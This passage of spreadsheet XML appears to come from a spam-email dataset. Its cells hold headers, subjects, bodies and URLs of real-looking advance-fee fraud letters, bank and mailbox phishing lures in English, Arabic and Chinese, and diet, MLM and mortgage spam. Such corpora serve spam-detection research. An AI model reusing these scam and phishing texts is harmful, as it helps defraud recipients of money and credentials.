BUSINESS\nCONFIDENTIAL\nOR SECRET UNTIL THE FUND GET TRANSFERED INTO YOUR ACCOUNT FOR SAFETY\nAND\nSECURITY PURPOSE.\n\n\nFINALLY,CONTACT ME THROUGH MY EMAIL ADDRESS SO THAT WE WILL PROCEED\nWITH THIS BUSINESS IMMEDIATELY.\n\nMY REGARDS TO YOU AND YOUR FAMILY.\n\n\nYOURS FAITHFULLY,\n  DR.SAMI IBRAHIM,\n\n_________________________________________________________________\nGagnez des pc Windows Vista avec Live.com [URL]http://www.image-addict.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.image-addict.fr</t>
  </si>
  <si>
    <t>330</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Email Service &lt;&gt;\nDate: Wed, 31 Aug 2016 08:57:19 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Aug 2016 08:57:19 +0100</t>
  </si>
  <si>
    <t>Email Service &lt;&gt;</t>
  </si>
  <si>
    <t>jose@monkey.org</t>
  </si>
  <si>
    <t>Email Suspension Last Warning!!!</t>
  </si>
  <si>
    <t>g0DRD9V6866X31    	     	     	  	         F5NF6N3B4C:     	        `A8v84F5{B1 (jose@monkey.org) NCAY29\07ABDC89!  	     	      F5NF6OE1`6F:    	         b11P11lE8a0FR30ÿ0C`A8v84F5{B1 4D4DS73\07u28[8C    N0DN45_8Cÿ0C`A8\07N0DQ8DFDY20 cA5e36b16v7C01eB0F5NF6002    sFEW28ÿ0CO600081O60v84F5NF64D 4DS47}1AR3015GBQ4DBB    DEdCANE5N0BC8cA5ÿ0C93`A8v8415GBQ4DBBÿ1A     [URL]http://jose@monkey.org[/URL]     `A8v84F5{B1\07f2FNCAY29DC 89ÿ0CY82g9CO60N0DS47}1AR3015GB    	     	         F5NF6v7CNF6NBA:     	        F5{B1OE1`6FN2D_C3  	     	      Untitled Document         服務器警報                               郵件主題:                      您的郵箱 (jose@monkey.org) 今天將被關閉!         郵件信息:                 我們注意到，您的郵箱        配額即將用完                        不久後，您將不再能夠        接收或發送新郵件。                現在，你需要你的郵件配        額升級到15GB免費                點擊以下鏈接，讓您的15GB免費：         	   [URL]http://jose@monkey.org[/URL] 	          您的郵箱將是今天關        閉，如果你不升級到15GB                        郵件發件人:                郵箱信息中心</t>
  </si>
  <si>
    <t>http://jose@monkey.org http://jose@monkey.org</t>
  </si>
  <si>
    <t>182</t>
  </si>
  <si>
    <t>To: nan\nFrom: Samba &lt;petefi@gimelnet.rs&gt;\nDate: Wed, 30 Mar 2016 17:14:17 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 30 Mar 2016 17:14:17 +0200 (CEST)</t>
  </si>
  <si>
    <t>Samba &lt;petefi@gimelnet.rs&gt;</t>
  </si>
  <si>
    <t>=?utf-8?B?2LnYstmK2LLZiiDYp9mE2LnZhdmK2YQ=?=</t>
  </si>
  <si>
    <t>\nعزيزي العميل,                                \n                  السلام عليكم ورحمة الله وبركاته وبعد:\nنود أن نعلم سيادتكم بأن بسبب بعض التهديدات الامنية على حسابات العملاء المبجلين, قررنا نحن لزيادة الامان بالقيام بتحديث برنامج المصرف لزيادة الأمان على حسابات عملائنا الكرام.  ولنعلم سيادتكم أن هذا التحديث سيقوم بمحو جميع  الحسابات الغير محدثة. من أجل ضمان عدم محو حسابكم نرجو من سيادتكم قضاء بضع دقائق من وقتكم الثمين لاتمام التحديث وتأمين حسابكم. من أجل ذلك, الرجاء الضغط على الرابط المتواجد ادناه.\n\n[URL]http://headachecenters.us[/URL]\n\nنود أن نبلغ سيادتكم بأن بعد الإنتهاء من قيام التحديث على الإنترنت, سوف يقوم احد ممثلي خدمة العملاء بالإتصال على سيادتكم لأسباب أمنيه إذا لم يتم اكتمال التحديث بشكل تام أو بشكل صحيح.\nأخيراً وليس آخراً, نود أن نشكر سيادتكم على ثقتكم في مصرفنا وتعاونكم معنا.\nخدمة العملاء.  \n\n</t>
  </si>
  <si>
    <t>http://headachecenters.us</t>
  </si>
  <si>
    <t>181</t>
  </si>
  <si>
    <t>To: nan\nFrom: Samba &lt;petefi@gimelnet.rs&gt;\nDate: Wed, 30 Mar 2016 13:05:21 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 30 Mar 2016 13:05:21 +0200 (CEST)</t>
  </si>
  <si>
    <t>Dear valued customer</t>
  </si>
  <si>
    <t>Dear valued customer,\n\nDue to recent security threats on our customer’s accounts, there has been a recent update of our banking software for better security on customer accounts. The new software will wipe out accounts that have not been updated. To keep your account from expiring and closing we kindly ask that you take out a few minutes of your time to complete the update and secure your account. Please click the link below for the update\n\n[URL]http://balancedyoga.com.au[/URL]\n\nAfter completion of the update online a customer representative will call you for security reasons if your update is incomplete or was not completed correctly. We thank you for your continued loyalty to our bank and your cooperation.\nYours Faithfully,\nCustomer services\n\n</t>
  </si>
  <si>
    <t>http://balancedyoga.com.au</t>
  </si>
  <si>
    <t>1232</t>
  </si>
  <si>
    <t>To: nan\nFrom: Simon Wong &lt;SWONG11200@YAHOO.COM.HK&gt;\nDate: Wed, 30 Mar 2005 23:44:11 +1000</t>
  </si>
  <si>
    <t>Wed, 30 Mar 2005 23:44:11 +1000</t>
  </si>
  <si>
    <t>Simon Wong &lt;SWONG11200@YAHOO.COM.HK&gt;</t>
  </si>
  <si>
    <t>RESPONSE ASAP!.</t>
  </si>
  <si>
    <t>\nMR. SIMON WONG\nDAH SING BANK LTD.\n19 DES VOEUX RD. \nCENTRAL HONG KONG,\nHONK KONG.\n\nDear Friend,\n\nI am Mr.Simon Wong, credit officer of Dah Sing Bank\nLtd, Hong Kong. I  have an urgent and  very\nconfidential business proposition for you.\n\n\nOn october 15, 1999, our client Mr. Hatem Kamil Abdul\nFatah who was the deputy governor of Baghdad in Iraq\nand also business man made a numbered fixed deposit\nfor 12 calendar months, with a value of  Fourty\nMillions Five Hundred Thousand United State Dollars\nonly in my branch.\n\nUpon maturity several notice was sent to him, even\nafter the war late this year. \nAnother notification was sent and still no response\ncame from him. \nWe later find out that the Governor has been\nassasinated in Baghdad.\n\nThe websites below is a verification of the news about\nhis death:\n\n[URL]http://news.bbc.co.uk[/URL]\n\n[URL]http://www.uslaboragainstwar.org[/URL]\n\nAfter further investigation it was also discovered\nthat Mr. Hatem Kamil Abdul Fatah did not declare any\nnext of kin in his official papers including the paper\nwork of his bank deposit. And he also confided in me\nthe last time he was at my office that no one except\nme knew of his deposit in my bank.\n\nAccording to the Hong Kong Law,under china's foreign\nand defense affairs,at the expiration of 5 (five)\nyears,such funds will revert to the ownership of the\nchinese Government for financing military\noperations,such as purchasing of arms and ammunitions\nfor the military.\n\n\nIn order to avert this negative development,i will\nlike to seek for your permission as a foreigner to\nstand as the next of kin to  Mr. Hatem Kamil Abdul\nFatah so that the fruits of this old man's labor will\nnot be use for financing weapons which will further\nenhance the courses of war in the world in general.\n\n\nThe money will be paid into your account for us to\nshare in the ratio of 60% for me and 30% for you and\n10% for Expenses Incurred in the course of the\ntransaction.There is no risk at all as all the\npaperwork  for this transaction will be done by my\nattorney and with my position as the credit officer\nguarantees the successful execution of this\ntransaction. If you are interested,please reply\nimmediately.\n\nUpon your response, I shall then provide you with more\n details and that will help you understand the\ntransaction.\n\n\nYou should observe utmost confidentiality,and rest\nassured  that this  transaction would be most\nprofitable for both of us because I shall require your\nassistance to invest my share in your country.\n\nAwaiting your urgent reply.\n\nThanks and regards.\n\nMr.Simon Wong.\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.uslaboragainstwar.org</t>
  </si>
  <si>
    <t>4559</t>
  </si>
  <si>
    <t>To: cbmark@cbmark.com\nFrom: amknight@mailexcite.com\nDate: Wed, 30 Jul 1980 18:25:49</t>
  </si>
  <si>
    <t>Wed, 30 Jul 1980 18:25:49</t>
  </si>
  <si>
    <t>amknight@mailexcite.com</t>
  </si>
  <si>
    <t>cbmark@cbmark.com</t>
  </si>
  <si>
    <t>New Improved Fat Burners, Now With TV Fat Absorbers! Time:6:25:49 PM</t>
  </si>
  <si>
    <t>** *****Bonus Fat Absorbers As Seen On TV, Included Free With Purchase Of 2 Or\nMore Bottle, $24.95 Value*****  \n  \n***TAKE $10.00 OFF 2 &amp; 3 MONTH SUPPLY ORDERS, $5.00 OFF 1 MONTH SUPPLY! ***AND\nSTILL GET YOUR BONUS! PRICE WILL BE DEDUCTED DURING PROCESSING.  \n  \n***FAT ABSORBERS ARE GREAT FOR THOSE WHO WANT TO LOSE WEIGHT, BUT CAN'T STAY\nON A DIET***  \n  \n***OFFER GOOD UNTIL MAY 27, 2002! FOREIGN ORDERS INCLUDED!  \n  \nLOSE 30 POUNDS IN 30 DAYS... GUARANTEED!!!  \n  \nAll Natural Weight-Loss Program, Speeds Up The Metabolism Safely Rated #1 In\nBoth Categories of SAFETY &amp; EFFECTIVENESS In  \n(THE United States Today)  \n  \nWE'LL HELP YOU GET THINNER! WE'RE GOING TO HELP YOU LOOK GOOD, FEEL GOOD AND\nTAKE CONTROL IN 2002  \n  \n** Why Use Our Amazing Weight Loss Capsules?  \n  \n* They act like a natural magnet to attract fat.  \n* Stimulates the body's natural metabolism.   \n* Controls appetite naturally and makes it easier to eat the right foods consistently.  \n* Reduces craving for sweets.  \n* Aids in the absorption of fat and in overall digestion.  \n* Inhibits bad cholesterol and boosts good cholesterol.  \n* Aids in the process of weight loss and long-term weight management.  \n* Completely safe, UltraTrim New Century contains no banned substances and has no known side effects.  \n  \nWhat Makes UltraTrim New Century Unique?  \n  \nA scientifically designed combination of natural ingredients that provide\nlong-term weight management in a safe and effective manner.  \n  \n*****  \nReceive A Bonus Supply Of Ultra Trim New Century &amp; A Bottle Of Fat Absorbers\nListed Above, With Every Order Of 2 Or More Bottles. Offer Good Until May. 27,\n2002!  \n*****  \n  \nWE GLADLY SHIP TO ALL FOREIGN COUNTRIES!  \n  \nYou will be losing by tomorrow! Don't Wait, visit our web page below, and\norder now!  \n  \nEmail Address: ultratrimnow2001@aol.com  \n  \nOrder by 24 Hour Fax!!! 775-257-6657.  \n  \n*****************  \n[URL]http://www.geocities.com[/URL]  \n*****************  \n  \nThis is the easiest, fastest, and most effective way to lose both pounds and\ninches permanently!!! This weight loss program is designed specifically to\n"boost" weight-loss efforts by assisting body metabolism, and helping the\nbody's ability to manage weight. A powerful, safe, 30 Day Program. This is one\nprogram you won't feel starved on. Complete program for one amazing low price!\nProgram includes: **BONUS AMAZING FAT ABSORBER CAPSULES, 30 DAY - WEIGHT\nREDUCTION PLAN, PROGRESS REPORT!**  \n  \nSPECIAL BONUS..."FAT ABSORBERS", AS SEEN ON TV With every order...AMAZING MELT\nAWAY FAT ABSORBER CAPSULES with directions ( Absolutely Free ) ...With these\ncapsules you can eat what you enjoy, without the worry of fat in your diet. 2\nto 3 capsules 15 minutes before eating or snack, and the fat will be absorbed\nand passed through the body without the digestion of fat into the body.  \n  \nYou will be losing by tomorrow! Don't Wait, visit our web page below, and\norder now!  \n  \nEmail Address: ultratrimnow2001@aol.com  \n  \nOrder by 24 Hour Fax!!! 775-257-6657.  \n  \n*****************  \n[URL]http://www.geocities.com[/URL]  \n*****************  \n  \n___1 Month Supply $32.95 plus $4.75 S &amp; H, 100 Amazing MegaTrim Capsules.  \n  \n___2 Month Supply $54.95 plus $4.75 S &amp; H, 200 Amazing MegaTrim Capsules. (A\n$10.95 Savings, Free Bottle)!  \n  \n___3 Month Supply $69.95, Plus $4.75 S &amp; H, 300 Amazing MegaTrim Capsules. (A\n$28.90 Savings, Free Bottle)!  \n  \nTo Order by postal mail, please send to the below address. Make payable to\nUltraTrim 2002.  \n  \nUltra Trim 2002  \n4132 Pompton Ct.  \nDayton, Ohio 45405  \n(937) 567-9807  \n  \nOrder by 24 Hour Voice/Fax!!! 775-257-6657.  \n  \n*****  \n**Important Credit Card Information! Please Read Below!**  \n  \n* Credit Card Address, City, State and Zip Code, must match billing address to be processed.   \n  \n___Check  \n___MoneyOrder  \n___Visa  \n___MasterCard  \n___AmericanExpress  \n___Debt Card  \n  \nName_______________________________________________________  \n(As it appears on Check or Credit Card)  \n  \nAddress____________________________________________________  \n(As it appears on Check or Credit Card)  \n  \n___________________________________________________  \nCity,State,Zip(As it appears on Check or Credit Card)  \n  \n___________________________________________________  \nCountry  \n  \n___________________________________________________  \n(Credit Card Number)  \n  \nExpiration Month_____ Year_____  \n  \n___________________________________________________  \nAuthorized Signature  \n  \n*******IMPORTANT NOTE*******  \n  \nIf Shipping Address Is Different From The Billing Address Above, Please Fill\nOut Information Below.  \n  \nShipping Name______________________________________________  \n  \nShipping Address___________________________________________  \n  \n___________________________________________________________  \nShipping City,State,Zip  \n  \n___________________________________________________________  \nCountry  \n  \n___________________________________________________________  \nEmail Address &amp; Phone Number(Please Write Neat)  \n  \nTo Be Removed From Our Mail List, Click Here And Put The Word Remove In The\nSubject Line.  \n  \n\n</t>
  </si>
  <si>
    <t>http://www.geocities.com http://www.geocities.com</t>
  </si>
  <si>
    <t>2455</t>
  </si>
  <si>
    <t>To: nan\nFrom: george path &lt;george_path50@hotmail.fr&gt;\nDate: Wed, 30 Aug 2006 16:01:57 +0000</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2006 16:01:57 +0000</t>
  </si>
  <si>
    <t>george path &lt;george_path50@hotmail.fr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">REPLY URGENTLY PLEASE. </t>
  </si>
  <si>
    <t>Dear Friend.\n\n\nAttention Please,\n\n\nI am Georg Path, the Director in charge of Auditing and Accounting section \nof AFRICAN DEVELOPMENT BANK (A.D.B) Ouagadougou Burkina-faso West Africa. \nWith due respect and regard. I have decided to contact you on a business \ntransaction that will be very beneficial to both of us at the end of the \n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18.4M (Eighteen Million,Four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50% will be for me.  Please, you have been adviced to \nkeep "Top Secret" as I am still in service and intend to retire from service \n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George Path.\n\n_________________________________________________________________\nRetrouvez tout en un clin d'oeil avec la barre d'outil MSN Search ! \n[URL]http://desktop.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://desktop.msn.fr</t>
  </si>
  <si>
    <t>2751</t>
  </si>
  <si>
    <t>To: nan\nFrom: mark nguessane &lt;mark49nguessane@hotmail.com&gt;\nDate: Wed, 29 Nov 2006 15:56:00 +0000</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2006 15:56:00 +0000</t>
  </si>
  <si>
    <t>mark nguessane &lt;mark49nguessane@hotmail.com&gt;</t>
  </si>
  <si>
    <t>From Mark Nguessane.</t>
  </si>
  <si>
    <t>&gt;From Mark Nguessane.\n\nDear ,\n\nI am Mark Nguessane from Seirra-Leone I am the son of Chief Nguessane Bakari \nwho was the managing director and owner of NGEBAK Import/Export \ncompany,NGEBAK Logistics company and NGEBAK Glass company here in Abidjan \nCote d'Ivoire West Africa.\n\nDear I humbly wish to write you this letter in order that you will assist me \nand my only Sister Cecilia in this money transfer to your bank account in \nyour country for investment in a profitable business.\n\nOn the 11th october 2004 our late father attended the general meeting of all \nthe import/export companies in the country and unfortunately he was poisoned \nby his business rivals and he later died in the hospital.\n\nBut before his death,after staying in bed for three days in the hospital,he \ntold me that he deposited the sum of US$12,000,000.(Twelve Million US \ndollars) in a bank here in abidjan on behalf of his foreign business partner \nin abroad and he advised me to look for a co-beneficiary from abroad to \ntransfer these money to his account for investment in his country.\n\nPresently,the members of his extended family has claimed all his companies \nleaving nothing behind for us,his extended family members also sent us away \nfrom his house where we are living and they seized all our house hold \nproperties.\n\nWe are presently now staying in a hotel here in Abidjan Cote d'Ivoire \nbecause of our lives and the security of the valid documents which the bank \ngave to our late father on the day he made the deposit lest the members of \nour late fathers extended family will kill us and Claim these money in the \nbank.\n\nBased on our ignorance in the international business world of this sort,we \nhereby solicit for your urgent assistance as the co-beneficiary of these \nmoney, for the bank to transfer these money to your safe and secured bank \naccount in your country.\n\nfor further proceedings as we wait for your soonest response. Please,we \ndon't want neither third party nor publicity of any kind in this business \ntransaction as we have agreed to offer you 25% of the total sum and 75% will \nbe for us respectively as you will also assist us to join you in your \ncountry as soon as this money is transfered to your account in your country \nfor the investment.\n\nThanks in advance as we wait for your soonest response,\n\nYours Sincerely,\n\nMark and Cecillia Nguessane.\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://search.msn.click-url.com</t>
  </si>
  <si>
    <t>5012</t>
  </si>
  <si>
    <t>To: "AllWebContacts" &lt;turnkeyim@hotmail.com&gt;\nFrom: "Donna and Tony Scurlock" &lt;turnkeyim@hotmail.com&gt;\nDate: Wed, 29 May 2002 22:22:17 -0400</t>
  </si>
  <si>
    <t>Wed, 29 May 2002 22:22:17 -0400</t>
  </si>
  <si>
    <t>"Donna and Tony Scurlock" &lt;turnkeyim@hotmail.com&gt;</t>
  </si>
  <si>
    <t>"AllWebContacts" &lt;turnkeyim@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Turn Your PayPal account into a Non-Stop Cash Machine!! (Not a chain letter)</t>
  </si>
  <si>
    <t>I am sending you this message because we have communicated in the past about business opportunities. I hope you will enjoy this one as much as I do.\nTurn Your PayPal Account Into A Non-Stop Cash Machine!\nRe-Occurring 100% Commissions Paid Directly To Your PayPal Account! \n4 Out Of 10 Visitors Join INSTANTLY! \nShouldn't You Be Next? \nDid I Mention That It's Free For 15 Days? \nSimply go to: [URL]http://www.paypal-profits.com[/URL]\n\n\nBest Wishes,\n\nTony &amp; Donna Scurlock\nturnkeyim@hotmail.com\n\nThe Best Home-Based Business on the Planet!!\nWE BUILD YOUR DOWNLINE -- 1000 to 3500 members added per month!! \nFREE to JOIN!!\nMinimum Monthly Income!!\nGet all the details at: \n[URL]http://www.lifelong-income.com[/URL]\n\n\n\n****************************************************\nThis email message is sent in compliance with the the 106th Congress E-Mail User Protection Act (H.R. 1910) and the Unsolicited Commercial Electronic Mail Act of 2000 (H.R. 3113). Though our intention is not to communicate with you again if we receive no response from you, we do provide a valid vehicle for you to be removed from our email list. To be removed from our mailing list, simple reply to this message with REMOVE in the Subject line.\n\nPlease keep in mind that complaints to our email provider and service provider, could make honoring remove requests impossible and you will be in violation of the above legislation.\n****************************************************</t>
  </si>
  <si>
    <t>http://www.paypal-profits.com http://www.lifelong-income.com</t>
  </si>
  <si>
    <t>5011</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "Americorp" &lt;amc@insurancemail.net&gt;\nDate: Wed, 29 May 2002 19:36:23 -0400</t>
  </si>
  <si>
    <t>Wed, 29 May 2002 19:36:23 -0400</t>
  </si>
  <si>
    <t>"Americorp" &lt;amc@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Close 90% of Your Prospects</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_3C9CE7_01C2072F.40093DC0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  Work Smarter...Not Harder=0A= $300,000 Commission Seminar Sales System=09 =20  Learn the Secrets to Closing More Sales=0A= Develop the "Master Closer Mindset" with this system! =20 =20  =09 Call or e-mail   us today!  800-758-2203=09 - OR - =09 Please fill out the form below for more information	=20 Name:	  =09 E-mail	  =09 Phone:	  =09 City:	  	State:	  	 =09  	  	 	   =09 =20 *This is not a guarantee, but and illustration of hypothetical results. Your income depends strictly upon your own efforts and thus, could vary. We don't want anybody to receive our mailing who does not wish to receive them. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal Notice  =20 ------=_NextPart_000_3C9CE7_01C2072F.40093DC0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Close 90% of Your Prospects =20       =20          =20              =20             =20                =20                =20              =20                              Call or e-mail us = today! =20              - OR - =20             =20                =20                    =20                        =20                           Please fill = out the form below for more information =20                           Name: =20                              =20                           E-mail =20                              =20                           Phone: =20                              =20                           City: =20                              State: =20                              =20                             =20                                =20                              =20             =20               *This=20                 is not a guarantee, but and illustration of hypothetical = results.=20                 Your income depends strictly upon your own efforts and = thus, could=20                 vary.                 We don't want anybody to receive our mailing who does = not wish to=20                 receive them. This is professional communication sent to = insurance=20                 professionals. To be removed from this mailing list, DO = NOT REPLY=20                 to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal = Notice=20                ------=_NextPart_000_3C9CE7_01C2072F.40093DC0--</t>
  </si>
  <si>
    <t>5009</t>
  </si>
  <si>
    <t>To: yyyy-cv@spamassassin.taint.org\nFrom: "ResumeValet" &lt;info@resumevalet.com&gt;\nDate: Wed, 29 May 2002 11:59:02 -0700</t>
  </si>
  <si>
    <t>Wed, 29 May 2002 11:59:02 -0700</t>
  </si>
  <si>
    <t>"ResumeValet" &lt;info@resumevalet.com&gt;</t>
  </si>
  <si>
    <t>yyyy-cv@spamassassin.taint.org</t>
  </si>
  <si>
    <t>adv: Put your resume back to work</t>
  </si>
  <si>
    <t>Dear Candidate,\n\nWe recently came across a posting of your resume on the Internet.   After our \nresearch, we determined that it was not posted on over 45 other top job sites. \nThe impact to you is that over 83% of the employers and recruiters looking to \nhire candidates with your skills are not reading your resume.  \n\nIs your resume taking the day off?  \nWhile most people post their resumes on the top three job sites, such as Monster, \nHotJobs, and CareerBuilder, there are many other specialized job sites that employers \nand recruiters use to find candidates.  \n\nWhen those specialized job sites are combined with the top three job sites, your \nresume is read by nearly 100% of the employers and recruiters who are looking \nto hire or place candidates with your skills.  \n\nFree Job Site Research\nVisit our web site for free information that will help you sort out the job site \nmadness.  We provide a free list of the top 50 job sites that can help shift \nyour job search into high gear.  Click here to get the free information that \ncan help change your future:  [URL]http://www.ResumeValet.com[/URL]  \n\nToday's job market is too competitive to rely on a limited strategy for finding \nyour next job.  If it is time to put your resume back to work, then it's time \nfor ResumeValet.  \n\nBest wishes always,\n\nResumeValet\n--  Putting your resume "back to work."\n[URL]http://www.ResumeValet.com[/URL] \n \nCopyright 2002\nProfessionals Online Network, Inc.</t>
  </si>
  <si>
    <t>http://www.ResumeValet.com http://www.ResumeValet.com</t>
  </si>
  <si>
    <t>5006</t>
  </si>
  <si>
    <t>To: &lt;sales@netnovation.co.za&gt;\nFrom: "Sally Mcfarlin" &lt;miononwifeil@hotmail.com&gt;\nDate: Wed, 29 May 2002 09:47:45 -0300</t>
  </si>
  <si>
    <t>Wed, 29 May 2002 09:47:45 -0300</t>
  </si>
  <si>
    <t>"Sally Mcfarlin" &lt;miononwifeil@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;sales@netnovation.co.za&gt;</t>
  </si>
  <si>
    <t>Looking for a second MORTGAGE?               11925</t>
  </si>
  <si>
    <t>| **Dear = HOMEOWNER,**      ---   &lt;= td&gt; **Interest rat= es are at their lowest point in 40 years!**      | **Let us do the shopping for = you... AND IT'S FREE!** ![](3D"[URL]http://61.129.81.74[/URL] |  _   Our nationwide network of lenders have hundred= s of different loan programs to fit your current situation:_ **   * Refinance   * Second Mortgage   * Debt Consolidation &lt;= li&gt;Home Improvement   * Purchase  ** Please **CLICK HERE&lt;= /a&gt;** to fill out a quick form. Your request will be transmitted to our = network of mortgage specialists.      ---|---            ---|---|---      **This service is100% FREE to home owne= rs and new home buyers without any obligation.**      ---      Did you receive an email advertisement in error= ? Our goal is to only target individuals who would like to take adv= antage of our offers. If you'd like to be removed from our mailing list, p= lease click on the link below. You will be removed immediately and automat= ically from all of our future mailings.         ---   We protect all email addresses from other third= parties. Thank you. | Please remove me.</t>
  </si>
  <si>
    <t>http://61.129.81.74</t>
  </si>
  <si>
    <t>1949</t>
  </si>
  <si>
    <t>To: nan\nFrom: a hafaf &lt;mohamedah_009@hotmail.com&gt;\nDate: Wed, 29 Mar 2006 22:13:07 +0000</t>
  </si>
  <si>
    <t>Wed, 29 Mar 2006 22:13:07 +0000</t>
  </si>
  <si>
    <t>a hafaf &lt;mohamedah_009@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">PLEASE REPLY IMMIDIATELY </t>
  </si>
  <si>
    <t>(READ CAREFULLY ADN KEEP CONFIDENTIAL)\n\nFROM/MR MOHAMEDAH A HAFAR\n\nTHE MANAGER OF AUDIT &amp;\nACCOUTANCY DEPT.\nBANK OF AFRICA(B.O.A)\nOUGADOUGOU?BURKINA-FASO\n\nDear partner\n\nGood day and how are you doing with your family? Hope fine.\nPlease let this message do not be a surprise to you because i got your \ncontact information and lay all the trust in you before i decided to \ndisclose this confidential and successful transaction to you.\n\nI am the MOHAMEDAH A HAFAR  AUDIT &amp; ACCOUNTANCY DEPARTMENT of our bank and i \ndecided to contact you over this financial transaction worth the sum of \nNINETEEN MILLION,THREE HUNDRED THOUSAND UNITED STATES DOLLARS \n($19,300,000.00 ) for our present future success.\n\nThis is an abandoned fund that belongs to one of our bank foreign customers \nwho died along with his entire family on through plane crash disaster about \n3 years ago.Meanwhile i was very fortune to came across the deceased file \nwhen i was arranging the old and abandoned customers files of 2002-2005 in \nother to submit to the entire bank management  for an official \nre-documentation.\n\nBe obviously informed that it was stated in our BANKING POLICY and signed \nlawfully that if such fund remains unclaimed  till the period of FOUR(4) \nyears started counting from the date when the beneficiary died, the money \nwill be transferred into the BANK TREASURY as an unclaimed fund.Besides, it \nis not authorized by the law guiding our bank for a citizen of BURKINA FASO \nto make the claim of the fund.So the request of you as a foreigner is \nnecessary to apply for the claim and transfer of the fund smoothly into your \nreliable bank account as the NEXT OF KIN to the deceased.\n\nNote that when the fund is transferred into your account, Thirty Five \nPercent (35%) will be for you in respect of all your assistance for the \ntransfer of the fund into your account and provision of the bank account \nwhere the bank will remit the fund into,Fifty Five Percent (55%) will be for \nme as the rest Ten Percent(10%) will be shared to  Charity Organisations \nCenters, Motherless Babies Homes, and helpless people that surrounded us \naround the World.\n\nIf you are really sure of your integerity, trustworthy and confidentiality, \nand accept not to cheat, betray or disappoint me after this when the fund is \ntransferred into your account, reply for the\nre-assurance with your telephone and fax numbers  necessary for effective \ncommunication. As soon as you reply , call me through my private telephone \nnumber on (00226 76 498168 ) so that i will let you know the steps and \nprocedures to follow in order to finalize this transaction immediately.\n\nI expect your urgent communication.\nYours sincerely,\n\nMR MOHAMEDAH  A  HAFAR.\n\nTHE MANAGER AUDIT ACCOUNTANCY DEPT( B.O.A).\n\n_________________________________________________________________\nMSN Messenger: appels gratuits de PC  PC ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>3305</t>
  </si>
  <si>
    <t>To: nan\nFrom: MRS. ANNAH KRUGA &lt;a_annah50@hotmail.com&gt;\nDate: Wed, 29 Aug 2007 17:41:23 +0200</t>
  </si>
  <si>
    <t>Wed, 29 Aug 2007 17:41:23 +0200</t>
  </si>
  <si>
    <t>MRS. ANNAH KRUGA &lt;a_annah50@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM MRS   ANNAH  KURGA</t>
  </si>
  <si>
    <t>\n\n\nFROM MRS ANNAH KURGA\nNO 345 Oxford Road Roosebank\nJohannesburg,\nTEL: +27-83 9510312.\nMy Alternative Email Address:  annah1@myway.com\nTHE DIRECTOR/C.E.O,\n\nMy name is Mrs. annah kurga the wife of Wilfred kurga from Zimbabwe. This\nmight be a surprise to you about where I got your contact address, I got\nyour address from the South African Network Online {SAINO} when I was\ndesperately looking for a trust-worthy person to assist my son who is\ncurrently residing in South Africa, and so I decided to contact you.\nDuring the current war against the farmers in Zimbabwe from the supporters\nof our President Robert Mugabe to claim all the white-owned farms to his\nparty members and his followers, he ordered all the white farmers to\nsurrender their farms to his party members.\nMy husband was one of the best farmers in our country and because he did\nnot support Mugabes ideas, Mugabes supports invaded my husband farm and\nburnt everything in the farm, killing my husband and made away with a lot\nof items in my husband farm.\nBefore his death, my husband had deposited with one of the Security\nCompany in Johannesburg, South Africa the sum of (20Million  United States\nDollars). After the death of my husband, my son {john} decided to move out\nof my country to Republic of South Africa where my husband had deposited\nthe money with the Security Company as valuables.\nPlease why I am contacting you is to assist my son to move this money out\nof South Africa because as asylum seekers he is not allowed to operate any\nBank Account or assured of security our investment within in the country.\nWe have agreed to offer you 20% of the total sum for your assistance, 5%\nwill be out for any expenses that may be incurred in the course of this\ntransaction while 75% will be for me and my family which I believe that\nwith your help we will invest it in your country.\nAll I want you to do is to furnish me with your private phone and fax\nnumbers for easy communication. You can contact my son on his private\ntelephone number {JOHN KURGA} on: +27-83 9510312. or on his email address\nthus: annah1@myway.com\n Waiting for your urgent response.\nPLEASE YOU CAN READ ABOUT PROBLEMS IN ZIMBABWE AND HOW MY HUSBAND DIED,\nFROM THE LINKS BELOW.\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n\nBest Regards.\nMRS. ANNAH KURGA.\nFor the Family FROM MRS ANNAH KURGA\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk</t>
  </si>
  <si>
    <t>203</t>
  </si>
  <si>
    <t>To: aminat_usman@fsmail.net\nFrom: ami44000@netzero.com\nDate: Wed, 28 May 2003 03:41:09 +0000</t>
  </si>
  <si>
    <t>Wed, 28 May 2003 03:41:09 +0000</t>
  </si>
  <si>
    <t>ami44000@netzero.com</t>
  </si>
  <si>
    <t>aminat_usman@fsmail.net</t>
  </si>
  <si>
    <t>urgent and confidential</t>
  </si>
  <si>
